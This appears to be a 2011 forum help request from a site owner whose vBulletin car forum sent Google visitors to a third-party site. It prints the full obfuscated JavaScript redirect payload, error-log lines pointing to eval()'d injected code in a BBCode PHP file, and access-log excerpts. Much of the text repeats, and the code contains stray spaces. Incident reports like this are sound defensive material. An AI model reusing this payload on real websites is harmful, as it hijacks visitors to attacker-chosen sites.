Tweet
One of our sites was hit by the redirect from google.
In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:
When I open the page with this code in IE it goes to file2store.com.
I can't find this code in my templates. Is it of any use defining where it comes from?
I also noticed the following...
In the error logs it shows:
[Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
pass-by-reference has been deprecated - argument passed by value; If you would
like to pass it by reference, modify the declaration of [runtime function
name](). If you would like to enable call-time pass-by-reference, you can set
allow_call_time_pass_reference to true in your INI file. However, future
versions may not support this any longer. in
/var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/
many times. It started showing when the redirect stopped working.
Anybody?
The redirect is back and the errors have stopped! Why?
The last error was at 17:12:22
From access log:
There is nothing strange to see...?
In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:
<html><head></head><body><script type=
"text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
"text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
I can't find this code in my templates. Is it of any use defining where it comes from?
I also noticed the following...
In the error logs it shows:
[Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
pass-by-reference has been deprecated - argument passed by value; If you would
like to pass it by reference, modify the declaration of [runtime function
name](). If you would like to enable call-time pass-by-reference, you can set
allow_call_time_pass_reference to true in your INI file. However, future
versions may not support this any longer. in
/var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/
many times. It started showing when the redirect stopped working.
Anybody?
The redirect is back and the errors have stopped! Why?
The last error was at 17:12:22
From access log:
77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET
/18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200
10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
66.249.72.100 - -
[03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0
(compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.245.91.19 -
- [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html
HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0
(compatible; Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
93.125.201.157 - -
[03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513
"http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE
8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET
CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET
/18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:29 +0200] "GET
/18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
/18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200
10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
66.249.72.100 - -
[03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0
(compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.245.91.19 -
- [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html
HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0
(compatible; Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
93.125.201.157 - -
[03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513
"http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE
8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET
CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET
/18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:29 +0200] "GET
/18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
There is nothing strange to see...?
Comment